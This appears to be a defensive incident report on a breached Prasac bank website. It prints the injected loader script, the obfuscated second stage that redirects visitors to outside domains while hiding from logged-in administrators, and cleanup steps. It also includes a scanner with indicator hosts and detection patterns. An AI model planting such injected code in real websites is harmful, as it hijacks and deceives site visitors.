# Prasac website breach investigation
## Analysis
The following page redirects visitors to a third-party website outside the organization's control:
https://www.prasac.com.kh/en/news-and-event/prasac-becomes-new-member-of-bakong-system
Inspecting the page source shows the following injected script tags (the same tag appears four times):
```html
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
```
Each of these tags loads the script at
http://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=04
whose contents are:
```javascript
// Stage 1 (pixel.js): inject a second-stage script whose URL is hidden in a
// String.fromCharCode() call so the domain does not appear in plain text.
var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,105,116,104,98,101,115,116,119,105,115,104,101,115,106,97,110,110,121,46,99,111,109,47,102,111,108,108,111,119);
// Inject only once: skip if a script whose URL contains "/follow" is already present.
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;) {
    if (alls[i].src.indexOf("/follow") > -1) {
        nt3 = false;
    }
}
if (nt3 == true) {
    document.getElementsByTagName("head")[0].appendChild(elem);
}
```
Decoding the call `elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,105,116,104,98,101,115,116,119,105,115,104,101,115,106,97,110,110,121,46,99,111,109,47,102,111,108,108,111,119);` gives `https://withbestwishesjanny.com/follow`, the URL of the second-stage script.
The contents of https://withbestwishesjanny.com/follow (whitespace added for readability):
```javascript
var pp = finwgtt();
if (pp == 0) {
    window.stop(); location.replace('https://red.toupandgoforward.com/f.php?h=zsmfnahbwv3rqcwa3RX&yJ=51&s1=56831&s2=news&s3=73212');
}
// Returns 1 (skip the redirect) on wp-login.php or when the wp-settings-time cookie is set.
function finwgtt() {
    var sdmfsjhg = document.cookie.indexOf('wp-settings-time') !== -1;
    if (window.location.href.indexOf("wp-login.php") > -1) { return 1; }
    if (sdmfsjhg) { return 1; } else { return 0; }
    return 0; // unreachable
}
```
The `finwgtt()` check suppresses the redirect for visitors who carry a `wp-settings-time` cookie (which WordPress sets only for logged-in users) or who are on `wp-login.php`, so a logged-in site administrator never sees the redirect; any verification of the cleanup must therefore be done from a logged-out browser or a non-browser fetch. Note also that the resource serves different content on different requests. A second fetch returned another redirect, this time to a different domain:
```javascript
var pp = finwgtt();
if (pp == 0) {
    window.stop(); location.replace('https://ticker.trasnaltemyrecords.com/cron.php?utm_camp=5&utm_click=4363&campid=235&red_id=6845&append=987432&u_click=56547&cpid=3472&rid=347342');
}
// Same cloaking check as in the first variant.
function finwgtt() {
    var sdmfsjhg = document.cookie.indexOf('wp-settings-time') !== -1;
    if (window.location.href.indexOf("wp-login.php") > -1) { return 1; }
    if (sdmfsjhg) { return 1; } else { return 0; }
    return 0; // unreachable
}
```
## Recommendations
1. Delete the injected script tags from every page:
```html
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script>
```
It is better to restore the website entirely from a clean backup, but be aware of the downtime and of the loss of any changes made since that backup.
2. We assume the affected site runs WordPress; the injected script's checks for the `wp-settings-time` cookie and `wp-login.php` support this. WordPress core and its plugins should be updated.
3. Contact the police to identify the owners of the `scripts.trasnaltemyrecords.com` and `withbestwishesjanny.com` domains.
4. Perform a website security audit. There is not enough information to determine how the site was breached; it could be an attack on WordPress, a stored XSS, or (less likely) an internal intrusion.
5. Compare the current state of the website with backups to find out whether there are any other unauthorized changes. This will also support a deeper investigation.
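To support recommendations 1 and 5, here is an added Python scanner (not part of the original report) that walks a web root or a restored backup and flags the two indicators found in this analysis: script tags loading from the hostile domains, and `String.fromCharCode()`-obfuscated URLs, which it decodes. The hostnames are those quoted in this report; the sample strings at the bottom are constructed from the quoted injection, not real site files.

```python
import os
import re
from urllib.parse import urlparse

# Indicator hosts taken from the injected code quoted in this report.
MALICIOUS_HOSTS = {"scripts.trasnaltemyrecords.com", "ticker.trasnaltemyrecords.com",
                   "withbestwishesjanny.com", "red.toupandgoforward.com"}
SCRIPT_SRC_RE = re.compile(r"<script[^>]*?\bsrc=['\"]([^'\"]+)['\"]", re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
SCAN_EXTENSIONS = (".html", ".htm", ".php", ".js")

def decode_fromcharcode(js):
    """Decode every String.fromCharCode(n, n, ...) literal found in js."""
    return ["".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
            for m in FROMCHARCODE_RE.finditer(js)]

def scan_text(content):
    """Return (kind, url) findings for one HTML, PHP or JS document."""
    findings = []
    # Stage 1 indicator: a <script src=...> pointing at a known-bad host.
    for m in SCRIPT_SRC_RE.finditer(content):
        if urlparse(m.group(1)).hostname in MALICIOUS_HOSTS:
            findings.append(("script-tag", m.group(1)))
    # Stage 2 indicator: a URL hidden in String.fromCharCode(), as pixel.js does.
    for decoded in decode_fromcharcode(content):
        if decoded.startswith(("http://", "https://")):
            bad = urlparse(decoded).hostname in MALICIOUS_HOSTS
            findings.append(("known-bad-url" if bad else "obfuscated-url", decoded))
    return findings

def scan_tree(root):
    """Walk a web root (or a restored backup) and map file path -> findings."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(SCAN_EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed samples mirroring the report's findings, not real site files.
SAMPLE_PAGE = ("<html><head><script src='https://scripts.trasnaltemyrecords.com/"
               "pixel.js?track=r&subid=043' type='text/javascript'></script></head><body>news</body></html>")
SAMPLE_PIXEL = ("elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,105,116,104,98,"
                "101,115,116,119,105,115,104,101,115,106,97,110,110,121,46,99,111,109,47,102,111,108,108,111,119);")
```

Run `scan_tree("/path/to/webroot")` against both the live site and the backup; a file that is flagged in one but not the other is exactly the unauthorized change recommendation 5 is looking for.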